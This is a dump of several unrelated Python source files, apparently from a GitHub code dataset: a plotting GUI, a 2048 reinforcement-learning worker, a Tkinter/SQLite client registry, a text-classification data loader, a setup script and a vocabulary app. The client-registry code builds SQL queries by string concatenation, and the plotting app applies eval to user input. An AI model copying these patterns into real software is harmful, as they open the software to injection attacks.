dialog.GetData()\n try:\n x1,x2 = [float(n) for n in x]\n y1,y2 = [float(n) for n in y]\n xx = np.linspace(x1, x2, points)\n yy = np.linspace(y1, y2, points)\n x,y = np.meshgrid(xx,yy)\n Z = eval(fxy)\n self.data.grid_data.SetArrayData(Z)\n self.sb.SetStatusText(SB_ON_CREATE_DATA_BIVARIABLE_FUNCTION)\n except:\n self.sb.SetStatusText(SB_ERROR_ON_CREATE_DATA)\n dialog.Destroy()\n \n def OnPlot(self,event):\n \"\"\"\n Line plot\n \"\"\"\n setplot.set_default_params(self.axes,self.figure)\n busy_dlg = aux.BusyInfo(\"Wait a moment...\", self)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n if cols == 2: # Common case\n self.axes.plot(X[:,0],X[:,1], picker=True)\n elif cols == 1:\n self.axes.plot(X[:,0], picker=True)\n elif cols > 2:\n for col in range(cols):\n #clabel = self.data.grid_data.GetColLabelValue(col)\n self.axes.plot(X[:,col], picker=True)\n self.canvas.draw()\n del busy_dlg\n \n def OnPolar(self,event):\n \"\"\"\n Unavailable\n \n Possibility: Rectangular axes -> Polar axes (temporarily)\n \"\"\"\n pass\n \n def OnBar(self,event):\n \"\"\"\n Plot bars\n \"\"\"\n setplot.set_default_params(self.axes, self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape \n # Reference: http://matthiaseisen.com/pp/patterns/p0178/\n #\n # Space between bars groups (FACTOR)\n KB = 0.85\n # Counter\n k = 0\n # For each row\n for jj in range(rows):\n kw = 1.0/(cols+1.5) # bar width\n x = np.linspace(k, k+KB, cols, endpoint=False)\n self.axes.bar(x, X[jj,:], width=kw, color=BAR_COLOR_CYCLE)\n k += 1\n \n # For ticks\n STEP = 1.0\n INITIAL_TICK = KB/2.0 # Medium point\n END_TICK = rows\n _xticks = np.arange(INITIAL_TICK, END_TICK, STEP)\n self.axes.set_xticks(_xticks)\n \n # For xticklabels\n _tick_labels = range(1, rows+1)\n self.axes.set_xticklabels(_tick_labels)\n \n # Change xticklabels using \"X-Ticks\" icon (AxesToolbar)\n \n # Redraw\n self.canvas.draw()\n \n \n def OnScatter(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n if cols == 2: # Common case\n self.axes.plot(X[:,0], X[:,1], \"o\", color=\"#348ABD\")\n elif cols == 1: # one column\n self.axes.plot(X[:,0], \"o\", color=\"#348ABD\")\n self.canvas.draw()\n \n def OnPie(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n \n n = float(rows) \n from matplotlib import cm\n a=np.random.random(n)\n colors=cm.Set1(np.arange(n)/n)\n \n if cols == 1:\n _ , self.pie_labels = self.axes.pie(X[:,0], labels=X[:,0], colors=colors)\n self.axes.set_aspect(\"equal\")\n else:\n pass # nothing to do here\n self.canvas.draw()\n \n def OnPieLabels(self,event):\n if hasattr(self, \"pie_labels\"):\n dlg = aux.PieLabelsDialog(None, self.pie_labels)\n if dlg.ShowModal() == wx.ID_OK:\n dlg.GetData()\n dlg.Destroy()\n else:\n self.sb.SetStatusText(u\"Pie plots unavailables\")\n self.canvas.draw()\n \n def OnImage(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n self.axes.imshow(X, cmap=cm.gray)\n self.canvas.draw()\n \n def OnContour(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n self.axes.contour(X)\n self.canvas.draw()\n \n def OnContourf(self,event):\n setplot.set_default_params(self.axes,self.figure)\n X = self.data.grid_data.GetArrayData()\n rows,cols = X.shape\n self.axes.contourf(X)\n self.canvas.draw()\n \n # OnReset\n \n def OnResetView(self,event):\n self.axes.autoscale()\n self.axes.set_aspect(\"auto\")\n self.canvas.disconnect_all()\n self.canvas.draw()\n \n def OnAbout(self,event):\n \"\"\"\n Show about dialog\n \"\"\"\n aux.AboutDialog(None)\n\n\nclass App(wx.App):\n \"\"\"\n Override OnInit\n \"\"\"\n def OnInit(self):\n frame = NanchiPlot(None)\n return True\n\n\ndef run():\n \"\"\"\n Entry point for nanchi\n \"\"\"\n REDIRECT = False\n LOG_FILE = \"nanchi.log\"\n app = App(REDIRECT)\n app.MainLoop()\n\n\nif __name__=='__main__':\n run() # Run app\n","repo_name":"JorgeDeLosSantos/NanchiPlot","sub_path":"nanchi/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16200,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"74180019251","text":"import datetime\nimport time\n\nimport gym\n# noinspection PyUnresolvedReferences\nimport gym_2048\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom torch import multiprocessing as mp\nfrom torch.autograd import Variable\nfrom torch.nn import functional\n\n\n# noinspection PyArgumentList\nclass Worker(mp.Process):\n def __init__(self, shared_model, target_model, optimizer, move_counter, episodes_counter, start_time, lock,\n args, last_1000, last_1000_loss, worker_id, eps_end):\n super(Worker, self).__init__()\n self.shared_model = shared_model\n self.target_model = target_model\n self.optimizer = optimizer\n self.move_counter = move_counter\n self.episodes_counter = episodes_counter\n self.start_time = start_time\n self.lock = lock\n self.args = args\n self.last_1000 = last_1000\n self.last_1000_loss = last_1000_loss\n self.rewards = []\n self.loss = []\n\n self.env = gym.make('2048-v0').unwrapped\n self.eps_end = eps_end\n self.eps = self.args.eps_start\n self.env.seed(self.args.seed)\n self.worker_id = worker_id\n\n if self.worker_id == 0:\n self.count_tested = 0\n self.output_file_name = './trained_models/ADQN_{date:%Y_%m_%d__%H_%M_%S}.txt'\\\n .format(date=datetime.datetime.now())\n\n if self.args.start_step != 0:\n self.eps -= self.args.start_step * ((self.args.eps_start - self.eps_end) / self.args.eps_decay)\n\n def game_state_to_input(self, game_state):\n if self.args.use_big_input:\n input_state = torch.FloatTensor(16, 4, 4).zero_()\n\n for i in range(4):\n for j in range(4):\n index = int(np.log2(game_state[i * 4 + j]) - 1) if game_state[i * 4 + j] != 0 else -1\n if index >= 0:\n input_state[index, i, j] = 1\n\n else:\n input_state = torch.FloatTensor(4, 4).zero_()\n\n for i in range(4):\n for j in range(4):\n input_state[i, j] = np.log2(game_state[i * 4 + j]) / 15 if game_state[i * 4 + j] != 0 else 0\n input_state = input_state.unsqueeze(0)\n\n return input_state.unsqueeze(0)\n\n def input_to_game_matrix(self, input_state):\n matrix = np.zeros((4, 4))\n\n if self.args.use_big_input:\n indices = input_state.nonzero()\n for exponent, i, j in indices:\n matrix[int(i), int(j)] = int(2**int(exponent+1))\n\n else:\n for i in range(4):\n for j in range(4):\n if input_state.data[0][i][j] != 0:\n matrix[i, j] = int(2 ** (input_state.data[0][i][j] * 15))\n\n return matrix\n\n def select_action(self, state):\n sample = np.random.random()\n\n if sample > self.eps:\n x = Variable(state, volatile=True).type(torch.FloatTensor)\n action = self.shared_model(x).data.sort(descending=True)[1]\n for i in range(4):\n if self.env.is_valid(action[0][i]):\n return torch.from_numpy(np.array([action[0][i]])).type(torch.LongTensor)\n else:\n arr = np.random.permutation([0, 1, 2, 3])\n for i in range(4):\n if self.env.is_valid(arr[i]):\n return torch.from_numpy(np.array([arr[i]])).type(torch.LongTensor)\n\n def optimize_model(self, states, rewards, actions, next_states):\n if len(next_states) == 1 and next_states[0] is None:\n return\n\n non_final_mask = torch.LongTensor([i for i, s in enumerate(next_states) if s is not None])\n non_final_next_states = Variable(torch.cat([s for s in next_states if s is not None]), volatile=True)\n\n state_batch = Variable(torch.cat(states))\n action_batch = Variable(torch.cat(actions))\n reward_batch = Variable(torch.cat(rewards))\n\n state_values = self.shared_model(state_batch)\n\n state_action_values = state_values.gather(1, action_batch)\n next_state_q_values = Variable(torch.zeros(len(states), 4).type(torch.FloatTensor))\n next_state_values = Variable(torch.zeros(len(states)).type(torch.FloatTensor))\n\n non_valid_action_mask = torch.FloatTensor(len(non_final_next_states), 4)\n for i in range(len(non_final_next_states)):\n for j in range(4):\n if self.env.is_valid(j, self.input_to_game_matrix(non_final_next_states[i])):\n non_valid_action_mask[i, j] = 0\n else:\n non_valid_action_mask[i, j] = float('-inf')\n\n model_result = self.target_model(non_final_next_states)\n next_state_q_values.data.index_copy_(0, non_final_mask, model_result.data)\n next_state_q_values[non_final_mask] += Variable(non_valid_action_mask)\n next_state_values[non_final_mask] = next_state_q_values[non_final_mask].max(1)[0]\n\n expected_state_action_values = (next_state_values * self.args.gamma) + reward_batch\n loss = functional.smooth_l1_loss(state_action_values, expected_state_action_values)\n\n with self.lock:\n self.optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm(self.target_model.parameters(), self.args.max_grad_norm)\n self.share_model()\n self.optimizer.step()\n\n if self.episodes_counter.value <= 1000:\n self.last_1000_loss.append(loss.data[0])\n else:\n self.last_1000_loss[self.episodes_counter.value % 1000] = loss.data[0]\n\n def share_model(self):\n for local_param, shared_param in zip(self.target_model.parameters(), self.shared_model.parameters()):\n if shared_param.grad is not None:\n return\n shared_param._grad = local_param.grad\n\n def test_performance(self):\n state = self.game_state_to_input(self.env.reset())\n episode = self.episodes_counter.value\n eps = self.eps\n self.eps = 0\n\n while True:\n action = self.select_action(state)\n\n next_state, reward, done, _ = self.env.step(action[0])\n state = self.game_state_to_input(next_state)\n\n if done:\n print('Episode: {}, Test Score: {}, Highest Tile: {}'.format(\n episode, self.env.score, self.env.highest()))\n print('MPS: {}, Moves: {}, Avg. 1000 {}'.format(\n self.move_counter.value / (time.time() - self.start_time),\n self.move_counter.value, sum(self.last_1000) / 1000.))\n\n if self.episodes_counter.value >= 1000:\n self.loss.append(sum(self.last_1000_loss) / 1000.)\n self.rewards.append(sum(self.last_1000) / 1000.)\n plot_graphs(self.rewards, self.loss)\n output_file = open(self.output_file_name, 'a')\n output_file.write('{}, {}, {}, {}\\n'\n .format(sum(self.last_1000) / 1000., self.move_counter.value,\n self.episodes_counter.value, sum(self.last_1000_loss) / 1000.))\n output_file.flush()\n output_file.close()\n break\n\n self.eps = eps\n\n if self.count_tested % 10 == 0:\n print('Saving model')\n model_name = \"ADQN_\" + '{date:%Y_%m_%d__%H_%M_%S}'.format(date=datetime.datetime.now())\n torch.save({\n 'model': self.shared_model.state_dict(),\n 'optimizer': self.optimizer.state_dict()\n }, './trained_models/{}.pth'.format(model_name))\n\n self.count_tested += 1\n\n def run(self):\n moves = 0\n reward_sum = 0\n done = False\n t = 0\n\n state = self.env.reset()\n states = [(state, 0)]\n state = self.game_state_to_input(state)\n\n while True:\n if done:\n reward_sum = 0\n moves = 0\n\n batch_states = []\n batch_rewards = []\n batch_actions = []\n batch_next_states = []\n\n for step in range(self.args.num_steps):\n with self.lock:\n self.move_counter.value += 1\n\n if self.move_counter.value % 40000 == 0:\n self.target_model.load_state_dict(self.shared_model.state_dict())\n\n moves += 1\n t += 1\n\n action = self.select_action(state)\n\n next_state, reward, done, _ = self.env.step(action[0])\n\n reward = np.log2(reward) / 15 if reward != 0 else 0\n reward_sum += reward\n states.append((next_state, reward_sum))\n\n next_state = self.game_state_to_input(next_state)\n\n if done:\n next_state = None\n\n batch_rewards.append(torch.FloatTensor([reward]))\n batch_actions.append(torch.LongTensor([[action[0]]]))\n batch_states.append(state)\n batch_next_states.append(next_state)\n\n state = next_state\n\n if self.eps > self.eps_end:\n self.eps -= (self.args.eps_start - self.eps_end) / self.args.eps_decay\n\n if done:\n test = False\n with self.lock:\n self.episodes_counter.value += 1\n\n if self.episodes_counter.value <= 1000:\n self.last_1000.append(reward_sum)\n else:\n self.last_1000[self.episodes_counter.value % 1000] = reward_sum\n\n if self.worker_id == 0 and self.episodes_counter.value > 100 * (self.count_tested + 1):\n test = True\n\n if test:\n self.test_performance()\n\n if len(states) > 50:\n state, reward_sum = states[int(len(states) / 2)]\n self.env.Matrix = state.reshape((4, 4))\n states = [(state, reward_sum)]\n else:\n state = self.env.reset()\n states = [(state, 0)]\n state = self.game_state_to_input(state)\n\n break\n\n self.optimize_model(batch_states, batch_rewards, batch_actions, batch_next_states)\n\n\ndef plot_graphs(rewards, loss):\n plt.figure(1)\n plt.clf()\n plt.title('Training')\n plt.xlabel('Episode')\n plt.ylabel('Score')\n plt.plot(np.array(rewards))\n\n if len(rewards) >= 100:\n means = [np.array(rewards[i:i+100]).mean() for i in range(0, len(rewards), 100)]\n plt.plot(means)\n\n plt.pause(0.001)\n\n plt.figure(2)\n plt.clf()\n plt.title('Training')\n plt.xlabel('Episode')\n plt.ylabel('Loss')\n plt.plot(np.array(loss))\n\n plt.pause(0.001)\n","repo_name":"BenediktKersjes/rl_2048","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":11033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7899516268","text":"from tkinter import *\nfrom tkinter import ttk\nimport sqlite3\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter, A4\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.platypus import SimpleDocTemplate, Image\nimport webbrowser\nimport base64\n\nroot = Tk()\n\nclass relatorios():\n def printCliente(self):\n webbrowser.open(\"cliente.pdf\")\n \n def geraRelatCliente(self):\n self.c = canvas.Canvas(\"cliente.pdf\")\n self.codigoRel = self.codigo_entry.get()\n self.clienteRel = self.cliente_entry.get()\n self.telefoneRel = self.telefone_entry.get()\n self.cpfRel = self.cpf_entry.get()\n\n self.c.setFont(\"Helvetica-Bold\",24)\n self.c.drawString(200, 790, \"Ficha do Cliente\" )\n self.c.setFont(\"Helvetica-Bold\",14)\n self.c.drawString(100, 750, 'Nome: ') \n self.c.drawString(100, 720, 'Telefone: ')\n self.c.drawString(100, 690, 'Cpf: ')\n\n self.c.setFont(\"Helvetica\",14)\n self.c.drawString(200, 750, self.clienteRel) \n self.c.drawString(200, 720, self.telefoneRel)\n self.c.drawString(200, 690, self.cpfRel)\n\n self.c.rect(20, 630, 550, 200, fill=False, stroke=True)\n\n \n self.c.showPage()\n self.c.save()\n self.printCliente()\n\nclass funcs():\n\n def limpa_tela(self):\n self.codigo_entry.delete(0, END)\n self.cliente_entry.delete(0, END)\n self.telefone_entry.delete(0, END)\n self.cpf_entry.delete(0, END)\n\n def conecta_db(self):\n self.conn=sqlite3.connect(\"LCBL.db\")\n self.cursor=self.conn.cursor()\n\n def desconecta_db(self):\n self.conn.close()\n\n def monta_tabelas(self):\n self.conecta_db()\n self.cursor.execute(\"CREATE TABLE if not exists clientes(nome_do_cliente text, telefone text, cpf text )\")\n self.conn.commit()\n self.desconecta_db()\n\n def variaveis(self):\n self.cod=self.codigo_entry.get()\n self.cliente=self.cliente_entry.get()\n self.telefone=self.telefone_entry.get()\n self.cpf=self.cpf_entry.get()\n\n def add_clientes(self):\n #self.codigo=self.codigo=self.codigo_enrty.get()\n self.variaveis()\n self.conecta_db()\n self.cursor.execute(\"INSERT INTO clientes (nome_do_cliente, telefone, cpf) values (?, ?, ?)\",(self.cliente, self.telefone, self.cpf))\n self.conn.commit()\n \n self.desconecta_db()\n self.select_lista()\n self.limpa_tela()\n\n def select_lista(self):\n self.l_cliente.delete(*self.l_cliente.get_children())\n self.conecta_db()\n lista=self.cursor.execute(\"SELECT rowid, * FROM clientes ORDER BY rowid ASC;\")\n for i in lista:\n self.l_cliente.insert(\"\", END, values=i)\n self.desconecta_db()\n\n def onDoubleClick(self, event):\n self.limpa_tela()\n self.l_cliente.selection()\n\n for n in self.l_cliente.selection():\n col1 ,col2, col3, col4= self.l_cliente.item(n, 'values')\n self.codigo_entry.insert(END,col1)\n self.cliente_entry.insert(END,col2)\n self.telefone_entry.insert(END,col3)\n self.cpf_entry.insert(END,col4)\n\n def deletar(self):\n self.variaveis()\n self.conecta_db()\n self.cursor.execute(\"DELETE FROM clientes WHERE rowid = \"+self.cod+\" \")\n self.conn.commit()\n self.desconecta_db()\n self.limpa_tela()\n self.select_lista()\n \n def alterar(self):\n self.variaveis()\n self.conecta_db()\n self.cursor.execute(\"UPDATE clientes SET nome_do_cliente = (?), telefone = (?), cpf = (?) WHERE rowid = \"+self.cod+\" \", (self.cliente, self.telefone, self.cpf))\n self.conn.commit()\n self.desconecta_db()\n self.select_lista()\n self.limpa_tela()\n\n def buscar(self):\n self.conecta_db()\n self.l_cliente.delete(*self.l_cliente.get_children())\n self.cliente_entry.insert(END, '%')\n nome=self.cliente_entry.get()\n self.cursor.execute(\"SELECT rowid, * FROM clientes WHERE nome_do_cliente LIKE '%s' ORDER BY nome_do_cliente ASC\" % nome)\n buscanome=self.cursor.fetchall()\n for i in buscanome:\n self.l_cliente.insert(\"\", END, values=i)\n self.limpa_tela()\n self.desconecta_db()\n\nclass Application(funcs, relatorios):\n\n def __init__(self) -> None:\n self.root = root\n self.tela()\n self.frames_da_tela()\n self.widgets_frame_1()\n self.lista_frame2()\n self.select_lista()\n self.menus()\n root.mainloop()\n pass\n\n def tela(self):\n self.root.title(\"Cadastro de clientes\")\n self.root.configure(background='black')\n self.root.geometry('800x600')\n self.root.resizable(True,True)\n self.root.maxsize(width=1000, height=700)\n self.root.minsize(width=700, height=600)\n\n def frames_da_tela(self):\n self.frame_1 = Frame(self.root, bg=\"#B6B4E6\" ,bd=4, highlightbackground='gray',highlightthickness=2)\n self.frame_2 = Frame(self.root, bd=4, highlightbackground='gray',highlightthickness=2)\n self.frame_1.place(relx=0.02, rely=0.02, relwidth=0.96, relheight=0.46 )\n self.frame_2.place(relx=0.02, rely=0.50, relwidth=0.96, relheight=0.46 )\n \n def widgets_frame_1(self):\n\n self.bt_limpar = Button(self.frame_1, text= 'Limpar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.limpa_tela )\n self.bt_limpar.place(relx=0.2, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_buscar = Button(self.frame_1, text= 'Buscar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command=self.buscar)\n self.bt_buscar.place(relx=0.3, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_inserir = Button(self.frame_1, text= 'Inserir', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.add_clientes)\n self.bt_inserir.place(relx=0.6, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_alterar = Button(self.frame_1, text= 'Alterar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.alterar)\n self.bt_alterar.place(relx=0.7, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.bt_apagar = Button(self.frame_1, text= 'Apagar', bd= 6, fg='#003233', font= ('arial',10,'bold'), command= self.deletar)\n self.bt_apagar.place(relx=0.8, rely=0.1, relwidth=0.1, relheight=0.15)\n\n self.lb_codigo=Label(self.frame_1, text= \"Código\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_codigo.place(relx= 0.05 ,rely= 0.05)\n\n self.codigo_entry=Entry(self.frame_1, bd= 4)\n self.codigo_entry.place(relx=0.05 ,rely=0.15, relwidth= 0.1)\n\n self.lb_cliente=Label(self.frame_1, text= \"Nome\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_cliente.place(relx= 0.05 ,rely= 0.25)\n\n self.cliente_entry=Entry(self.frame_1, bd= 4)\n self.cliente_entry.place(relx=0.05 ,rely=0.35,relwidth=0.25)\n\n self.lb_telefone=Label(self.frame_1, text= \"Telefone\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_telefone.place(relx= 0.05 ,rely= 0.45)\n\n self.telefone_entry=Entry(self.frame_1, bd= 4)\n self.telefone_entry.place(relx=0.05 ,rely=0.55,relwidth=0.25)\n\n self.lb_cpf=Label(self.frame_1, text= \"CPF\", bg=\"#B6B4E6\", fg='#003233', font= ('arial',10,'bold'))\n self.lb_cpf.place(relx= 0.05 ,rely= 0.65)\n\n self.cpf_entry=Entry(self.frame_1, bd= 4)\n self.cpf_entry.place(relx=0.05 ,rely=0.75,relwidth=0.25)\n\n def lista_frame2(self):\n self.l_cliente= ttk.Treeview(self.frame_2, height=5, columns=(\"col1\",\"col2\",\"col3\",\"col4\"))\n style = ttk.Style()\n style.configure(\"Treeview.Heading\", font=(\"TkDefaultFont\", 9, \"bold\"))\n \n self.l_cliente.heading(\"#0\", text=\"\")\n self.l_cliente.heading(\"#1\", text=\"Código\")\n self.l_cliente.heading(\"#2\", text=\"Nome\")\n self.l_cliente.heading(\"#3\", text=\"Telefone\")\n self.l_cliente.heading(\"#4\", text=\"CPF\")\n\n self.l_cliente.column(\"#0\", width=1)\n self.l_cliente.column(\"#1\", width=50, anchor=\"center\")\n self.l_cliente.column(\"#2\", width=200, anchor=\"center\")\n self.l_cliente.column(\"#3\", width=125, anchor=\"center\")\n self.l_cliente.column(\"#4\", width=125, anchor=\"center\")\n\n self.l_cliente.place(relx=\"0.02\", rely=\"0.1\", relwidth=\"0.95\", relheight=\"0.85\")\n \n self.scrollLista=Scrollbar(self.frame_2, orient=\"vertical\")\n self.l_cliente.configure(yscroll=self.scrollLista.set)\n self.scrollLista.configure(command=self.l_cliente.yview)\n self.scrollLista.place(relx=\"0.96\", rely=\"0.1\", relwidth=\"0.02\", relheight=\"0.85\")\n self.l_cliente.bind(\"\", self.onDoubleClick)\n\n def menus(self):\n menubar= Menu(self.root)\n self.root.config(menu=menubar)\n filemenu=Menu(menubar)\n filemenu2=Menu(menubar)\n\n def quit(): \n self.root.destroy()\n\n menubar.add_cascade(label=\"Opções\", menu= filemenu)\n menubar.add_cascade(label=\"Relatórios\", menu= filemenu2)\n\n filemenu.add_command(label=\"Sair\", command=quit)\n filemenu.add_command(label=\"Limpa campos\", command=self.limpa_tela)\n\n filemenu2.add_command(label=\"Ficha do cliente\", command=self.geraRelatCliente)\n\n \nApplication()\n","repo_name":"leo-vilelela/Interfaces-com-Tkinter","sub_path":"CadastroDeClientes.py","file_name":"CadastroDeClientes.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41924573064","text":"from base.base_data_loader import BaseDataLoader\n\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils.np_utils import to_categorical\n\nimport pandas as pd\nimport numpy as np\nimport json\n\nclass FunctionalityDataLoader(BaseDataLoader):\n def __init__(self, config):\n # load data\n super(FunctionalityDataLoader, self).__init__(config)\n \n\n\n def get_train_data(self):\n functionality_to_index = {'background':0, 'objective':1, 'method':2, 'result':3, 'other':4}\n abstract_sents = []\n functionality = []\n func_index = []\n\n # load data from jsonl\n # train_pubmed.jsonl\n # {\"abstract_id\": \"24562799\", \"sentences\": [\"Many pathogenic ...\", \"It was ...\"], \n # \"labels\": [\"background\", \"background\"], \n # \"confs\": [1, 1]}\n with open('./data/functionality/train_pubmed.jsonl') as f:\n for line in f:\n json_dict = json.loads(line)\n abstract_sents += json_dict['sentences']\n functionality += json_dict['labels']\n\n # transfer functionality to index\n for f in functionality:\n func_index.append(functionality_to_index[f])\n\n # 0-1 encoding of func index\n func_index = to_categorical(np.asarray(func_index))\n\n # traning tokenizor\n tokenizer = Tokenizer(num_words=self.config.data_loader.MAX_NB_WORDS)\n tokenizer.fit_on_texts(abstract_sents)\n # sequences = tokenizer.texts_to_sequences(abstract_sents)\n\n # token embedding matrix, [sentence_number, MAX_SENT_LENGTH]\n data = np.zeros((len(abstract_sents), self.config.data_loader.MAX_SENT_LENGTH), dtype='int32')\n for i, sent in enumerate(abstract_sents):\n word_tokens = text_to_word_sequence(sent)\n j = 0 # the j th words in a sentence\n for _, word in enumerate(word_tokens):\n if word in tokenizer.word_index and j < self.config.data_loader.MAX_SENT_LENGTH and tokenizer.word_index[word] < self.config.data_loader.MAX_NB_WORDS:\n data[i, j] = tokenizer.word_index[word]\n j = j + 1\n\n self.word_index = tokenizer.word_index\n print('Total %s unique tokens.' % len(self.word_index))\n\n # data = pad_sequences(sequences, maxlen=self.config.data_loader.MAX_SENTS)\n print('Shape of data tensor:', data.shape)\n print('Shape of label tensor:', func_index.shape)\n\n self.X_train = data\n self.y_train = func_index\n self.X_test = data\n self.y_test = func_index\n\n # load glove matrix\n embeddings_index = {}\n f = open('./data/glove.6B.100d.txt')\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n\n print('Load glove data.')\n # glove embedding matrix\n self.embedding_matrix = np.random.random((len(self.word_index) + 1, self.config.data_loader.EMBEDDING_DIM))\n for word, i in self.word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n self.embedding_matrix[i] = embedding_vector\n\n np.savetxt('./experiments/embedding_matrix_func_200.txt', self.embedding_matrix)\n\n return self.X_train, self.y_train, len(self.word_index), self.embedding_matrix\n","repo_name":"hxiaom/SFGAN","sub_path":"data_loader/functionality_data_loader.py","file_name":"functionality_data_loader.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37782825710","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\nimport codecs\n\ndef read(filename):\n return codecs.open(filename, encoding='utf-8').read()\n\n\nlong_description = '\\n\\n'.join([read('README'),\n read('AUTHORS'),\n read('CHANGES')])\n\n__doc__ = long_description\n\nsetup(name='lantz_qt',\n version='0.5.dev0',\n license='BSD',\n description='Instrumentation framework',\n long_description=long_description,\n keywords='measurement control instrumentation science',\n author='Hernan E. Grecco',\n author_email='hernan.grecco@gmail.com',\n url='https://github.com/lantzproject',\n install_requires=['lantz>=0.5.dev0',\n ],\n include_package_data=True,\n packages=['lantz_qt',\n 'lantz_qt.blocks',\n 'lantz_qt.utils'],\n zip_safe=False,\n platforms='any',\n entry_points={},\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries'\n ],\n)\n","repo_name":"alemazzeo/lantz_qt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"21872936552","text":"################################################################################\n##\n## BY: WANDERSON M.PIMENTA\n## PROJECT MADE WITH: Qt Designer and PySide2\n## V: 1.0.0\n##\n################################################################################\n\nimport sys\nimport platform\nfrom PySide2 import QtCore, QtGui, QtWidgets\nfrom PySide2.QtCore import (QCoreApplication, QPropertyAnimation, QDate, QDateTime, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt, QEvent)\nfrom PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QIcon, QKeySequence, QLinearGradient, QPalette, QPainter, QPixmap, QRadialGradient)\nfrom PySide2.QtWidgets import *\n# GUI FILE\nfrom ui_main import Ui_MainWindow\n# IMPORT FUNCTIONS\nfrom ui_functions import *\nfrom random import shuffle\n# from frmStart import *\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nnumwords=0\n\nclass MainWindow(QMainWindow):\n # List lưu trữ 5 từ vựng mỗi Box\n lstPracticeBox1=[]\n lstPracticeBox2=[]\n lstPracticeBox3=[]\n lstPracticeBox4=[]\n lstPracticeBox5=[]\n \n def loadVocabulary(self):\n global numwords\n Date_Now = date.today()\n Date_Old = findMaxDate()\n length=numwords\n print(\"Num\",numwords)\n print(Date_Now)\n print(Date_Old)\n if Date_Now > Date_Old: \n #Cập nhật lại những từ trả lời đúng của ngày trước\n # Nếu trả lời đúng thì sẽ tăng thêm 1 level\n # Ví dụ từ ở Box1 trả lời đúng thì từ đó sẽ được đưa lên Box 2\n updateBox(Date_Old)\n lstBox1 = find_by_level_box(1)\n print(lstBox1)\n \n shuffle(lstBox1)\n if len(lstBox1) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox1=lstBox1[0:length]\n ############################\n lstBox2 = find_by_level_box(2)\n shuffle(lstBox2)\n if len(lstBox2) > 30: \n length=numwords+len(lstBox1)//10 \n lstPracticeBox2=lstBox2[0:length]\n #############################\n lstBox3 = find_by_level_box(3)\n shuffle(lstBox3)\n if len(lstBox3) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox3=lstBox3[0:length]\n #############################\n lstBox4 = find_by_level_box(4)\n shuffle(lstBox4)\n if len(lstBox4) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox4=lstBox4[0:length]\n #############################\n lstBox5 = find_by_level_box(5)\n shuffle(lstBox5)\n if len(lstBox5) > 30: \n length=numwords+len(lstBox1)//10\n lstPracticeBox5=lstBox5[0:length]\n #############################\n #insert vào mỗi Box 5 từ \n for item in lstPracticeBox1:\n addReview(item[0])\n for item in lstPracticeBox2:\n addReview(item[0])\n for item in lstPracticeBox3:\n addReview(item[0])\n for item in lstPracticeBox4:\n addReview(item[0])\n for item in lstPracticeBox5:\n addReview(item[0])\n\n\n def __init__(self):\n QMainWindow.__init__(self)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.loadVocabulary()\n ## TOGGLE/BURGUER MENU\n ########################################################################\n # 